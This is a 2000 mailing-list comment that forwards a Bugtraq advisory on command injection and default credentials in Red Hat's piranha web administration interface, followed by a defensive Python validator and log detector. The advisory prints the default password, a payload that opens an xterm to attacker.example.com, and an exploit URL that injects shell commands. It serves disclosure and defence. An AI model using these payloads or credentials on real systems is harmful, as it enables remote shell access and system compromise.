piranha
Luca Giuzzi
giuzzi a dmf.bs.unicatt.it
Tue 25 Apr 2000 21:28:15 UTC
I am including a copy of an advisory that has just circulated on BUGTRAQ...
perhaps this offers more details.
Information on piranha specifically can be found at the following URL:
http://www.redhat.com/support/wpapers/piranha/
Essentially it is a system for doing load balancing (and HA) across
different servers.
The acronym LVS stands for: Linux Virtual Server... information can be found at:
http://www.redhat.com/support/docs/howto/piranha/
A comment on the vulnerability, as illustrated below:
there are two problems...
1) the default login/password...
the problem is minor (and this is what my previous post referred to): the password
should in any case be reset after configuring the system... otherwise it is like having
an account with administrative privileges and no password (not root)... never a good thing for
a machine on the network!
2) A missing check in the module that sets the password... this is only reachable after
getting past point (1), which should not happen anyway, but it is a sign of
programming with little attention to security... stack overflows, the use of `magic' strings,
etc. are standard techniques for compromising a system and trying to gain root privileges
on it... this is nothing new and, even if an exploit (as in this
case) is highly improbable, it absolutely must not be possible...
in certain cases code auditing is essential... possibly before integration into a
distribution [N.B. the problem emerged from examining the code, not directly] ...
Cheers,
lg
> Delivered-To: bugtraq a securityfocus.com
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Reply-To: Max Vision <vision a WHITEHATS.COM>
> Sender: Bugtraq List <BUGTRAQ a SECURITYFOCUS.COM>
> Subject: piranha default password/exploit
> X-To: bugtraq a securityfocus.com
> To: BUGTRAQ a SECURITYFOCUS.COM
>
> Hi,
>
> In the interest of full disclosure (I used an alias the last few times,
> let's see how this goes as me) here are the details of the piranha
> vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha
>
> To summarize, piranha is a GUI tool for monitoring, configuring, and
> administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12
> supports web-based php3 interface which is protected by basic
> authentication. A default account is provided, that if known, would allow
> remote users to change the piranha password as well as run arbitrary
> commands on the web server by exploiting a hole in the passwd.php3 script.
>
> First the IDS Signature to detect the attack: http://whitehats.com/IDS/272
>
> (See http://whitehats.com/ids/ for basic information about using
> signatures to detect attacks on your network.)
>
> Now the exploit:
>
> There are basically two problems with the piranha-0.4.12 package, that
> when combined yield shell access for an attacker. The reason earlier
> versions are not vulnerable is because of the shift away from the gui,
> towards a web-based php3 interface.
>
> The first problem is the default account and password that protect the web
> directory containing the administrative php3 scripts. This is what ISS
> called a "backdoor" - which is actually a default password. (If ISS found
> something other than what I found, please email me...)
>
> The default username/password is: piranha/q
>
> Now the ironic part is, the second part of the vulnerability lies within the
> program that is used to change the password! By default this is installed
> into /home/httpd/html/piranha/secure as passwd.php3, or:
>
> http://victim.example.com/piranha/secure/passwd.php3
>
> Once you authenticate (see first vulnerability), a form will come up
> asking for the new password. To avoid typo-regret, you must enter the
> password twice. It will then proceed to change the piranha password to
> whatever you provided as the new password. It does this by passing your
> input to a shell command without filtering for metacharacters...
>
> passwd.php3:
> echo "<TD>The passwords you supplied match<BR>";
> $temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
>
> As one can see, this allows for more creative "new passwords", such as
> this one:
>
> g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
>
> Example exploit URL (requires authentication):
> http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
>
> Fix is available for x86 RH 6.2 users at
> ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
>
> --
> Max Vision Network Security <vision a whitehats.com>
> Network Security Assessment http://maxvision.net/
> 100% Success Rate : Penetration Testing & Risk Mitigation
> Free Visibility Analysis and Price Quote for Your Network
>
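As an added defender-side example (not code from the original post or from the piranha package), the following Python shows the input check passwd.php3 lacked, builds the htpasswd call as an argument vector instead of a shell string, and runs a detection over constructed access-log lines that include the advisory's example URL. The Apache-style log format and the path /piranha/secure/passwd.php3 are assumed from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters the shell interprets when a value is dropped unquoted into a
# backtick command, as passwd.php3 did with $try1 in the advisory above.
SHELL_META = re.compile(r"""[;&|`$(){}<>\\'"*?!#~\s]""")

def password_is_shell_safe(candidate: str) -> bool:
    """Reject any new password the shell could reinterpret as extra commands."""
    return bool(candidate) and SHELL_META.search(candidate) is None

def htpasswd_argv(passwd_file: str, user: str, new_password: str) -> list:
    """Argument vector for htpasswd that never passes through a shell.
    Each element is one argv entry, so metacharacters cannot split commands;
    the check above is kept as defence in depth. The path is the one the
    advisory quotes (/usr/bin/htpasswd)."""
    if not password_is_shell_safe(new_password):
        raise ValueError("new password contains shell metacharacters")
    return ["/usr/bin/htpasswd", "-b", passwd_file, user, new_password]

# Constructed Apache-style access log: one injected request (the advisory's
# example URL), one legitimate password change, one unrelated request.
ACCESS_LOG = """\
10.0.0.5 - piranha [25/Apr/2000:21:28:15 +0000] "GET /piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT HTTP/1.0" 200 512
10.0.0.6 - piranha [25/Apr/2000:21:30:02 +0000] "GET /piranha/secure/passwd.php3?try1=Str0ngPass&try2=Str0ngPass&passwd=ACCEPT HTTP/1.0" 200 512
10.0.0.7 - - [25/Apr/2000:21:31:40 +0000] "GET /piranha/index.php3 HTTP/1.0" 200 1024
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def suspicious_passwd_requests(log_text: str) -> list:
    """Return (client, parameter, decoded value) for every passwd.php3 request
    whose try1/try2 value contains shell metacharacters after URL decoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/piranha/secure/passwd.php3"):
            continue
        params = parse_qs(parts.query)  # '+' -> ' ', '%3B' -> ';'
        for name in ("try1", "try2"):
            for value in params.get(name, []):
                if not password_is_shell_safe(value):
                    hits.append((client, name, value))
    return hits
```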